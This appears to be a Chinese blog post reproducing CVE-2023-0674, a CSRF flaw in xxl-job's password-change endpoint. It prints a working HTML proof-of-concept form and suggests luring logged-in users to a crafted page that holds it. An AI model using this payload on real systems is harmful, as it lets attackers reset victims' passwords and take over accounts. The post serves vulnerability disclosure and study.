CVE-2023-0674 漏洞复现
前半个月在渗透测试中遇到了xxl-job框架的CSRF漏洞,网上也没有对应的复现帖子,然后我就提交了CVE,今天终于有回复了,可惜被人抢先了,那我就来写一下复现过程吧。
在搭建好的xxl-job框架中,点击修改密码,更新密码,对其抓包
然后在burp或者yakit中生成CSRF的poc(在数据包处右键,一键生成)
下面是我在yakit上生成的poc
<html>
<body>
<form action="http://xxx.xxx.xxx.xxx/xxl-job-admin/user/updatePwd" method="POST" name="form1" enctype="application/x-www-form-urlencoded" >
<input type="hidden" name="password" value="123456"/>
<input type="submit" value="Submit request" />
</form>
<script>history.pushState('', '', '/');</script>
</body>
</html>
将这段poc放到精心构造的网站上,诱导用户在登录状态下点击
要怎么构造就看各位自由发挥了,我这是最简陋的一个点击框
在用户登录状态下点击按钮,就会完成CSRF攻击
此时密码已经更换为poc中设置的密码
重新登陆可以验证是否已修改成功
虽然不是高危漏洞,但是第一次提交CVE,还是挺开心的。
可惜被抢先一步,哈哈哈哈哈,继续努力